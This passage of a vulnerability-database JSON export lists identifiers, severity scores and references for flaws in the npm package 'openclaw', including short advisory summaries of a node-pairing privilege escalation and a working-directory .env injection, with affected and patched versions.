                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"
                }
            ],
            "aliases": [
                "CVE-2026-41330",
                "GHSA-9gp8-hjxr-6f34"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-1p5p-eth5-3ufu"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90329?format=api",
            "vulnerability_id": "VCID-1pbz-8rnx-dkhe",
            "summary": "OpenClaw: Node Pairing Reconnect Command Escalation Bypasses operator.admin Scope Requirement\n## Impact\n\nNode Pairing Reconnect Command Escalation Bypasses operator.admin Scope Requirement.\n\nA previously paired node could reconnect with a broader command set, including exec-capable commands, without forcing the operator/admin re-pairing path.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<=2026.4.5`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @zsxsoft and @KeenSecurityLab for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42432",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00027",
                            "scoring_system": "epss",
                            "scoring_elements": "0.08076",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00027",
                            "scoring_system": "epss",
                            "scoring_elements": "0.08073",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00027",
                            "scoring_system": "epss",
                            "scoring_elements": "0.0809",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42432"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-5wj5-87vq-39xm",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "7.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T18:17:47Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-5wj5-87vq-39xm"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42432",
                    "reference_id": "CVE-2026-42432",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42432"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-5wj5-87vq-39xm",
                    "reference_id": "GHSA-5wj5-87vq-39xm",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-5wj5-87vq-39xm"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-command-escalation-via-node-pairing-reconnect-bypass",
                    "reference_id": "openclaw-command-escalation-via-node-pairing-reconnect-bypass",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "7.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T18:17:47Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-command-escalation-via-node-pairing-reconnect-bypass"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109872?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.8",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2g7x-vu14-nkde"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dqb2-dej7-augt"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-h9a4-1twb-d7d1"
                        },
                        {
                            "vulnerability": "VCID-hy24-6xpe-pkb7"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w2yd-uw91-9yck"
                        },
                        {
                            "vulnerability": "VCID-wyat-1259-2kg9"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8"
                }
            ],
            "aliases": [
                "CVE-2026-42432",
                "GHSA-5wj5-87vq-39xm"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-1pbz-8rnx-dkhe"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89803?format=api",
            "vulnerability_id": "VCID-1smq-mbty-jkaj",
            "summary": "OpenClaw has a CWD `.env` environment variable injection which bypasses host-env policy and allows config takeover\n## Summary\n\nOpenClaw loaded the current working directory `.env` before trusted state-dir configuration, allowing untrusted workspace state to inject host environment values.\n\n## Impact\n\nA repository or workspace containing a malicious `.env` file could override runtime configuration and security-sensitive environment settings when OpenClaw started there.\n\n## Affected Component\n\n`src/infra/dotenv.ts, src/cli/dotenv.ts`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `6a79324802` (`Filter untrusted CWD .env entries before OpenClaw startup`).",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41294",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00015",
                            "scoring_system": "epss",
                            "scoring_elements": "0.03519",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00015",
                            "scoring_system": "epss",
                            "scoring_elements": "0.03533",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00015",
                            "scoring_system": "epss",
                            "scoring_elements": "0.0352",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41294"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/6a793248024dca7685f63bcceb64a0096fd1586d",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/6a793248024dca7685f63bcceb64a0096fd1586d"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.28",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.28"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-8rh7-6779-cjqq",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "8.5",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-21T13:04:21Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-8rh7-6779-cjqq"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41294",
                    "reference_id": "CVE-2026-41294",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41294"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-8rh7-6779-cjqq",
                    "reference_id": "GHSA-8rh7-6779-cjqq",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-8rh7-6779-cjqq"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-environment-variable-injection-via-cwd-env-file",
                    "reference_id": "openclaw-environment-variable-injection-via-cwd-env-file",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.5",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-21T13:04:21Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-environment-variable-injection-via-cwd-env-file"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.28",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
